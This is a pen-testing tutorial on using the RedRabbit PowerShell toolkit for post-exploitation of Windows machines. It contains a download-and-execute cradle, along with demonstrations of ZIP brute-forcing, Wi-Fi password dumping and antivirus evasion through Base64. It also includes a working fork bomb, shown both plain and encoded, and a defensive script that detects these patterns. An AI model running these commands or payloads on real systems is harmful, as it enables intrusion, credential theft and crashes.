
How to use RedRabbit for pen testing and post-exploitation of Windows machines « Null Byte :: WonderHowTo



RedRabbit is an ethical hacking toolkit built for pen testing and reconnaissance. It can be used to identify attack vectors, brute-force protected files, extract saved network passwords, and obfuscate code. Created specifically for red teams, RedRabbit is the evil twin of its sibling BlueRabbit and is the offensive half of the “Rabbit Suite”.

The creator of RedRabbit, Ashley Moran, better known as securethelogs, makes a plethora of Windows-based tools for ethical hacking and penetration testing. RedRabbit happens to be one of my favorites.

RedRabbit offers pen testers of Windows systems an alternative to tools like PowerShell Empire (or just Empire), which is no longer in development. While RedRabbit isn’t quite taking up the torch in terms of the scope of Empire, a now-deprecated all-encompassing tool, RedRabbit is both lightweight and up to date, which the author says guarantees it will work on most Windows systems.

Moran’s tool can be downloaded and run directly in memory, reducing the chance of detection. As a bonus, Windows AMSI does not currently recognize RedRabbit as a malicious script (unlike most offensive PowerShell tools).

RedRabbit is still under active development, and while most of its features have been completed, a few are not fully fleshed out (at least at the time of publishing). So, for now, let’s focus on just some of the juicier things RedRabbit has to offer.

What you need

This is a post-exploitation tool, so you need administrator access to use RedRabbit. If you don’t have administrator privileges but would like to get them, privilege escalation can help, a topic we’ve covered on Null Byte more than once.

Apart from that, to use RedRabbit you only need a Windows computer, the latest version of PowerShell, and an internet connection.

Step 1: Check if you can run scripts

First, open Windows PowerShell as an administrator. You can search or browse for the app in Windows, then right-click it and select “Run as administrator”. Instead of right-clicking with PowerShell selected, you can hold Ctrl-Shift and press Enter; that keyboard shortcut opens apps in administrator mode. Click “Yes” if you are prompted to let PowerShell make changes.

Now make sure you can run scripts with your PowerShell execution policy:

C:\> Get-ExecutionPolicy

If PowerShell comes back with “Restricted”, go ahead and set the policy to RemoteSigned. Then confirm the change by typing Y and pressing Enter.

C:\> Set-ExecutionPolicy RemoteSigned

Step 2: Download, install and run RedRabbit

We’re going to download the RedRabbit PowerShell script as plain text directly from securethelogs’ GitHub repository for RedRabbit. To download RedRabbit and run it without ever saving the script to disk, we pass the downloaded text to “Invoke-Expression” (iex for short). RedRabbit should run immediately after this.

C:\> $url = "https://raw.githubusercontent.com/securethelogs/RedRabbit/master/redrabbit.ps1"
C:\> iex (New-Object Net.WebClient).DownloadString($url)

You could also shorten that to one line if you want:

C:\> iex (New-Object Net.WebClient).DownloadString("https://raw.githubusercontent.com/securethelogs/RedRabbit/master/redrabbit.ps1")

If for some reason you want to download and save the script, you can use the code below. It will save the PowerShell script in your chosen location, but it won’t open it automatically.

C:\> $out = "C:\ChosenLocation\Script.ps1"
C:\> $url = "https://raw.githubusercontent.com/securethelogs/RedRabbit/master/redrabbit.ps1"
C:\> Invoke-WebRequest -Uri $url -OutFile $out

To run RedRabbit from the saved file, type the path of the script preceded by a period and a backslash (.\), which tells PowerShell to run a script at that path.

C:\> .\ChosenLocation\Script.ps1

Step 3: Use RedRabbit

Once you run the tool, you will be greeted by RedRabbit’s logo and options menu, as seen below. We’re going to take a look at some of these options to see how they work. A full description of each option can be found on the securethelogs website.

██▀███  ▓█████ ▓█████▄  ██▀███   ▄▄▄       ▄▄▄▄    ▄▄▄▄    ██▓▄▄▄█████▓                 \,_
▓██ ▒ ██▒▓█   ▀ ▒██▀ ██▌▓██ ▒ ██▒▒████▄    ▓█████▄ ▓█████▄ ▓██▒▓  ██▒ ▓▒                  ` ,
▓██ ░▄█ ▒▒███   ░██   █▌▓██ ░▄█ ▒▒██  ▀█▄  ▒██▒ ▄██▒██▒ ▄██▒██▒▒ ▓██░ ▒░             __,.-" =__)
▒██▀▀█▄  ▒▓█  ▄ ░▓█▄   ▌▒██▀▀█▄  ░██▄▄▄▄██ ▒██░█▀  ▒██░█▀  ░██░░ ▓██▓ ░           ."        )
░██▓ ▒██▒░▒████▒░▒████▓ ░██▓ ▒██▒ ▓█   ▓██▒░▓█  ▀█▓░▓█  ▀█▓░██░  ▒██▒ ░        ,_/   ,    /_
░ ▒▓ ░▒▓░░░ ▒░ ░ ▒▒▓  ▒ ░ ▒▓ ░▒▓░ ▒▒   ▓▒█░░▒▓███▀▒░▒▓███▀▒░▓    ▒ ░░          _|    )_- _-`
  ░▒ ░ ▒░ ░ ░  ░ ░ ▒  ▒   ░▒ ░ ▒░  ▒   ▒▒ ░▒░▒   ░ ▒░▒   ░  ▒ ░    ░
  ░░   ░    ░    ░ ░  ░   ░░   ░   ░   ▒    ░    ░  ░    ░  ▒ ░  ░
   ░        ░  ░   ░       ░           ░  ░ ░       ░       ░
                 ░                               ░       ░
Creator: https://securethelogs.com / @securethelogs

Current User: timsacerlaptop\tim-laptop | Current Machine: TimsAcerLaptop
Session Running As Admin: True!!   |  Is User Domain Admin: Computer In WORKGROUP, Cannot Query AD

Please select one of the following:

Option 1: Quick Recon                               Option 10: Password Extraction
Option 2: Scan Subnet                               Option 11: Encode Commands (Base64)
Option 3: Clipboard Logger                          Option 12: Run Encoded Commands (Base64)
Option 4: Network Scanner                           Option 13: Edit Local Host (SMB Relay)
Option 5: DNS Resolver                              Option 14: Probe For SMB Share
Option 6: Brute Force ZIP                           Option 15: Web Crawler
Option 7: Brute WinRM                               Option 16: File Crawler
Option 8: Test Extraction Connection
Option 9: Show Local Firewall Deny Rules

 --- OSINT Options ----                             --- Cloud Options ----

Option A: Find Subdomains                           Option Azure: Query Azure/AzureAD
Option B: Daily PasteBin
Option C: Scan Azure Resource
Option D: Scan Socials For Usernames

Option ::

Quick Recon

Let’s take a look at the first option, “Quick Recon.” Type 1 and press Enter. This displays a wealth of information, including the current user’s privileges, such as the right to adjust process memory quotas (something that would be useful to know if you wanted to perform a buffer overflow attack, for example).

It also shows us the system accounts, which of those accounts have administrative privileges, our current network status, installed programs, and the system’s firewall rules so that we can identify potential attack vectors.

Option :: 1

User: ********
Hostname: ******

GROUP INFORMATION
-----------------
Group Name                                                    Type             SID          Attributes
============================================================= ================ ============ ===============================================================
Everyone                                                      Well-known group S-1-1-0      Mandatory group, Enabled by default, Enabled group
NT AUTHORITY\Local account and member of Administrators group Well-known group S-1-5-114    Mandatory group, Enabled by default, Enabled group
BUILTIN\Administrators                                        Alias            S-1-5-32-544 Mandatory group, Enabled by default, Enabled group, Group owner
...

PRIVILEGES INFORMATION
----------------------
Privilege Name                            Description                                                        State
========================================= ================================================================== ========
SeIncreaseQuotaPrivilege                  Adjust memory quotas for a process                                 Disabled
SeSecurityPrivilege                       Manage auditing and security log                                   Disabled
...

LOCAL USERS INFORMATION
-----------------------
User accounts for \\TIMSACERLAPTOP

-------------------------------------------------------------------------------
Administrator            DefaultAccount           Guest
Squibble                 TheRealTim               Tim-Laptop
WDAGUtilityAccount
The command completed successfully.

PROGRAM INFORMATION
-------------------
7-Zip
Acer
...
WindowsPowerShell

FIREWALL INFORMATION
--------------------
Name            DisplayName                DisplayGroup Protocol LocalPort RemotePort RemoteAddress Enabled         Profile Direction Action
----            -----------                ------------ -------- --------- ---------- ------------- -------         ------- --------- ------
SNMPTRAP-In-UDP SNMP Trap Service (UDP In) SNMP Trap    UDP      162       Any        LocalSubnet     False Private, Public   Inbound  Allow
SNMPTRAP-In-... SNMP Trap Service (UDP In) SNMP Trap    UDP      162       Any        Any             False          Domain   Inbound  Allow
WiFiDirect-K... WFD Driver-only (TCP-In)   WLAN Serv... TCP      Any       Any        Any              True             Any   Inbound  Allow
...
{D3972BB3-88... BitTorrent (UDP-In)                     UDP      Any       Any        Any              True             Any   Inbound  Allow

Options 2 and 9 are both included in Option 1’s quick recon, so you don’t need to run them separately if you have already used Option 1; you already have that information to hand.

Crack zip files

A rather interesting feature in RedRabbit is the ability to try to crack a password-protected ZIP file using a wordlist. For it to work, we need to have the 7-Zip application installed on our system.

To test this feature, I wrote a secret message in a .txt file and archived it with a password. Now the file cannot be extracted without a password.

What can it be?

We need a wordlist to crack it, one that hopefully contains the correct password. I used a list of common credentials from SecLists on GitHub.

Once we have both a ZIP file to crack and a wordlist, rerun RedRabbit with Y and select option 6, “Brute Force ZIP.” The tool will then ask you for the location of the file and of your wordlist. After both are given, the brute-force process begins.

Option:: 6

7Zip installed........
Let's Brute ........

Location of Zipped File :: C:\Temp\secret.zip
Location of Wordlist :: C:\Temp\wordlist.txt
ERROR: Wrong password : MySecret.txt
ERROR: Wrong password : MySecret.txt
ERROR: Wrong password : MySecret.txt
ERROR: Wrong password : MySecret.txt
ERROR: Wrong password : MySecret.txt
Password Found: retiasterriblesecret
------------ End -------------------

The Password Is: retiasterriblesecret

Rerun RedRabbit? (Y/N):

We cracked it! Who knew that “retiasterriblesecret” was the sixth most used password?

Dump Wi-Fi passwords

RedRabbit also makes it really easy to instantly display the credentials of any saved Wi-Fi network. To use this option, keep in mind that you need to use PowerShell as an administrator.

Rerun RedRabbit with Y and select option 10, “Password Extraction.” You will be asked to enter the location of a file where you want to save the credentials. If you prefer to have them printed directly in the PowerShell console, leave it blank and press Enter.

Option:: 10

Wireless Passwords Extracted......

Network Name: p****k
Password: w*****k

Network Name: j******s
Password: i****2

Network Name: a******e
Password: c**********a

Network Name: R*******T
Password: n**********7

Network Name: h*******5
Password: 2******************5

Rerun RedRabbit? (Y/N):

If you have administrator rights, you should technically already have access to the network credentials; RedRabbit just provides an easy and convenient interface to do this.

Encoding and executing commands in Base64

A common method to bypass antivirus software, or otherwise obfuscate code, is to encode commands in Base64. With RedRabbit we can encode PowerShell commands as well as run encoded commands (options 11 and 12).

To test RedRabbit’s encoding option, let’s take a simple (but effective) PowerShell fork bomb:

$fork = {
    param($p)
    $block = [ScriptBlock]::Create($p)
    Start-Job $block -ArgumentList "$p"
    Invoke-Command -ScriptBlock $block -ArgumentList "$p"
}
Invoke-Command -ScriptBlock $fork -ArgumentList $fork

Unfortunately, RedRabbit can only encode a few lines of text in Base64, so we’ll condense this into one line with a few aliases and semicolons. Select option 11, “Encode Commands (Base64),” and give the one-liner as the value for RedRabbit to encode.

Option:: 11

Enter The Value To Encode: $fork = {param($p);$block = [ScriptBlock]::Create($p);Start-Job $block -ar "$p";&$block "$p"};&$fork $fork

Encoded Command Below:
JABmAG8AcgBrACAAPQAgAHsAcABhAHIAYQBtACgAJABwACkAOwAkAGIAbABvAGMAawAgAD0AIABbAFMAYwByAGkAcAB0AEIAbABvAGMAawBdADoAOgBDAHIAZQBhAHQAZQAoACQAcAApADsAUwB0AGEAcgB0AC0ASgBvAGIAIAAkAGIAbABvAGMAawAgAC0AYQByACAAIgAkAHAAIgA7ACYAJABiAGwAbwBjAGsAIAAiACQAcAAiAH0AOwAmACQAZgBvAHIAawAgACQAZgBvAHIAawA=

Rerun RedRabbit (Y/N):

Now we have a Base64-encoded fork bomb! Disclaimer: this fork bomb will crash your computer. You have been warned.

To start our fork bomb, run RedRabbit again and select option 12, “Run Encoded Commands (Base64).” Paste the Base64 string when prompted and the code will be executed. Actually, don’t do this with my Base64 fork bomb unless you’re okay with Windows crashing.

Option:: 12

Paste Encoded Command Here: JABmAG8AcgBrACAAPQAgAHsAcABhAHIAYQBtACgAJABwACkAOwAkAGIAbABvAGMAawAgAD0AIABbAFMAYwByAGkAcAB0AEIAbABvAGMAawBdADoAOgBDAHIAZQBhAHQAZQAoACQAcAApADsAUwB0AGEAcgB0AC0ASgBvAGIAIAAkAGIAbABvAGMAawAgAC0AYQByACAAIgAkAHAAIgA7ACYAJABiAGwAbwBjAGsAIAAiACQAcAAiAH0AOwAmACQAZgBvAHIAawAgACQAZgBvAHIAawA=

Id     Name            PSJobTypeName   State         HasMoreData     Location
--     ----            -------------   -----         -----------     --------
1      Job1            BackgroundJob   Running       True            localhost
3      Job3            BackgroundJob   Running       True            localhost
5      Job5            BackgroundJob   Running       True            localhost
7      Job7            BackgroundJob   Running       True            localhost
9      Job9            BackgroundJob   Running       True            localhost
11     Job11           BackgroundJob   Running       True            localhost
13     Job13           BackgroundJob   Running       True            localhost
15     Job15           BackgroundJob   Running       True            localhost

After 48 iterations my computer crashed. In other words, well done!
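Both the in-memory download cradle from Step 2 and the Base64 option from this section leave the same kind of trace for defenders: PowerShell script block logging (Event ID 4104) records the script text as it actually runs, and an encoded command is nothing more than UTF-16LE text under Base64, so the obfuscation is reversible in one call. The Python triage script below is an added example for this article, not code from RedRabbit or from securethelogs. It finds Base64 runs that decode as PowerShell -EncodedCommand payloads and flags two indicator pairs (an Invoke-Expression/iex call together with a download primitive, and Start-Job together with [ScriptBlock]::Create) in both the raw line and the decoded text. The three sample log lines are constructed for the example; the second carries the Base64 string shown above and decodes back to the one-liner that was fed to option 11.

```python
"""Triage PowerShell command lines or 4104 script-block text for in-memory download
cradles and Base64 (UTF-16LE) encoded commands.  Added example; not RedRabbit code."""
import base64
import re

# Constructed sample records, not captured from a real host.  The first two mirror the
# commands shown in the article; the third is a benign administrative command.
SAMPLE_LINES = [
    'powershell.exe iex(New-Object Net.WebClient).DownloadString('
    '"https://raw.githubusercontent.com/securethelogs/RedRabbit/master/redrabbit.ps1")',
    "powershell.exe -EncodedCommand "
    "JABmAG8AcgBrACAAPQAgAHsAcABhAHIAYQBtACgAJABwACkAOwAkAGIAbABvAGMAawAgAD0AIABbAFMAYwByAGkAcAB0AEIAbABvAGMAawBdADoAOgBDAHIAZQBhAHQAZQAoACQAcAApADsAUwB0AGEAcgB0AC0ASgBvAGIAIAAkAGIAbABvAGMAawAgAC0AYQByACAAIgAkAHAAIgA7ACYAJABiAGwAbwBjAGsAIAAiACQAcAAiAH0AOwAmACQAZgBvAHIAawAgACQAZgBvAHIAawA=",
    "powershell.exe Get-ExecutionPolicy -List",
]

# A run of 40+ Base64 characters with optional padding: long enough to skip ordinary
# words and identifiers, short enough to catch any realistic -EncodedCommand blob.
B64_RUN = re.compile(r"[A-Za-z0-9+/]{40,}={0,2}")

# Each indicator needs a hit from both patterns.  They are checked against the raw
# line and against every decoded payload, so Base64 alone does not hide them.
INDICATORS = {
    "download_cradle": (
        re.compile(r"\biex\b|invoke-expression", re.I),
        re.compile(r"downloadstring|net\.webclient|invoke-webrequest|\biwr\b", re.I),
    ),
    "recursive_job_spawn": (
        re.compile(r"start-job", re.I),
        re.compile(r"\[scriptblock\]::create", re.I),
    ),
}


def decode_powershell_base64(blob: str):
    """Return the text behind a PowerShell -EncodedCommand blob, or None.

    powershell.exe expects the payload to be UTF-16LE text, so a genuine blob decodes
    to an even number of bytes and to printable characters.  Anything else (a URL
    path segment that happens to look like Base64, random binary) is rejected.
    """
    try:
        raw = base64.b64decode(blob, validate=True)
    except ValueError:  # binascii.Error is a ValueError subclass
        return None
    if len(raw) == 0 or len(raw) % 2:
        return None
    try:
        text = raw.decode("utf-16-le")
    except UnicodeDecodeError:
        return None
    if not all(ch.isprintable() or ch in "\r\n\t" for ch in text):
        return None
    return text


def triage_line(line: str) -> dict:
    """Decode any embedded encoded command and list the indicators the line matches."""
    decoded = []
    for blob in B64_RUN.findall(line):
        text = decode_powershell_base64(blob)
        if text is not None:
            decoded.append(text)
    findings = ["base64_encoded_command"] if decoded else []
    for candidate in [line, *decoded]:
        for name, (first, second) in INDICATORS.items():
            if name not in findings and first.search(candidate) and second.search(candidate):
                findings.append(name)
    return {"line": line, "decoded": decoded, "findings": findings}


def triage_log(lines):
    """Return the triage results for every line that matched at least one indicator."""
    return [result for result in (triage_line(line) for line in lines) if result["findings"]]


if __name__ == "__main__":
    for result in triage_log(SAMPLE_LINES):
        print(result["findings"])
        for text in result["decoded"]:
            print("  decoded:", text)
```

Run it as a script to see the two flagged lines, or import `triage_log` and feed it command lines exported from process-creation events or 4104 script block logs. The indicator table is the part to extend; the decoder deliberately rejects anything that is not even-length UTF-16LE printable text so that URL path segments and other Base64-looking runs do not produce noise.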

A handy tool

That was a brief overview of some of RedRabbit’s most interesting features; feel free to check out the others for yourself. Again, a number of features are not completely finished. The tool is still under active development, and securethelogs has been updating the GitHub repository periodically. In my testing, the clipboard logger (option 3) was not working, and PowerShell crashed every time I tried to use it. So there are still some bugs that need to be worked out.

Remember, all that RedRabbit can do are things you theoretically should be able to do as an administrator (like retrieve saved Wi-Fi passwords). As such, it does not represent an inherent vulnerability of Windows. What makes RedRabbit a useful tool is that it makes otherwise tedious pen testing tasks fully automated.


Cover image and screenshots by Retia / Null Byte



